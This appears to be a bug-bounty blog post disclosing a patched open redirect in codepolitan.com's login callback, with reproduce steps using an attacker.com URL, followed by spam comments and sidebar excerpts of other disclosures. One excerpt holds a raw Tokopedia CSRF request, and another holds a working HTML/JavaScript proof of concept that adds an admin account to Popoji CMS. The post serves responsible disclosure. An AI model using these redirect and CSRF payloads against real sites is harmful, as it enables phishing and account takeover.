Open Redirect On Codepolitan.com

Open Redirect On Codepolitan.com



Description : 

Open redirects and forwards are possible when a web application accepts untrusted
input that could cause the web application to redirect the request to a URL contained within untrusted
input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a
phishing scam and steal user credentials. Because the server name in the modified link is identical to the

original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and
forward attacks can also be used to maliciously craft a URL that would pass the application’s access
control check and then forward the attacker to privileged functions that they would normally not be
able to access.

Impact :

Force user go to untrusted website from codepolitan website

Location of bug : 

https://www.codepolitan.com/users/login?callback=

Payload :

http://attacker.com

Reproduce :

1. Open https://www.codepolitan.com/users/login?callback=http://attacker.com
2. Login, and you will be redirect to evil.com

Conclusion :

Open redirect make user not safe because force user go to untrusted website ( scam
/phising) without user know

Video :

https://youtu.be/uQ2OhTbcVOI 

Note :

Codepolitan crew its very fast on patch the bug, and them also will give me the SWAG , yeay !  

Comments

  1. sheela rajeshApril 12, 2019 at 11:50 PM

    Nice idea,keep sharing your ideas with us.i hope this information's will be helpful for the new learners.
    JAVA Training in Chennai
    JAVA Course in Chennai
    Digital Marketing Course in Chennai
    Python Training in Chennai
    Big data training in chennai
    Selenium Training in Chennai
    JAVA Training in Chennai
    JAVA Course in Chennai

    ReplyDelete
  2. deivaJune 8, 2020 at 7:03 PM

    "It is really a great and useful piece of information. I am glad that you shared this helpful info with us. Please keep us up to date like this. Thank you for sharing.
    Digital Marketing Training Course in Chennai | Digital Marketing Training Course in Anna Nagar | Digital Marketing Training Course in OMR | Digital Marketing Training Course in Porur | Digital Marketing Training Course in Tambaram | Digital Marketing Training Course in Velachery

    "

    ReplyDelete
  3. trubloggerJune 11, 2022 at 12:31 AM

    I was taking a gander at some of your posts in this site and I consider this net site is in suggest of reality warning! hold setting taking area... Avast VPN License

    ReplyDelete
  4. SyedhaseebulhassanJuly 18, 2022 at 10:12 PM

    Intriguing test for a weblog. I've been filtering the net for diversion just and showed up re your web site page. impeccable lucid. Thankful to you a ton for sharing your knowledge! it is fortifying to look that specific people anyway supplement an undertaking into adjusting to their locales. I'll be genuine to check affirm inside the works over again unambiguous quickly. Funny Earth Day Quote

    ReplyDelete

Post a Comment

Popular posts from this blog

Tokopedia - CSRF On Open Store

Image
CSRF Issue On Tokopedia,  List of bug on Tokopedia : - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-to-create-new-store-for.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-report-item.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-on.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-login.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-open-store.html Halo, Saya menemukan sebuah bug CSRF di tokopedia Pendahuluan bug ini bisa mengubah user picture di login seal Vuln Request: POST /ajax/shop/shop-status.pl?action=event_re_open HTTP/1.1 Host: www.tokopedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 33 Origin: null Cookie: Some Cookie Connection: close action=event_re_open&s_id=[id toko]...
Read more

Missing CSRF Token On Add Admin [Popoji CMS]

Image
Description: This is happen because when request add admin there's no CSRF token Step To Reproduce : <script>function getMe(){ // retrieve page content var xhr = new XMLHttpRequest(); // now execute the CSRF attack xhr.open("POST", "http://root/popoji/poadmin/ route.php?mod=user&act=addnew", true); xhr.withCredentials="true"; xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan dy21%40gmail.com&no_telp=083833232954&level=1'); } </script> <button onclick="getMe();">Let's Rock</button> 1. Save code to .html 2. upload them to host 3. execute it. Video :  https://www.youtube.com/watch?v=1FXXuSiB6jo Fix & Mitigation : give token when request sensitive action. Note: them give me permission to disclose it, and th...
Read more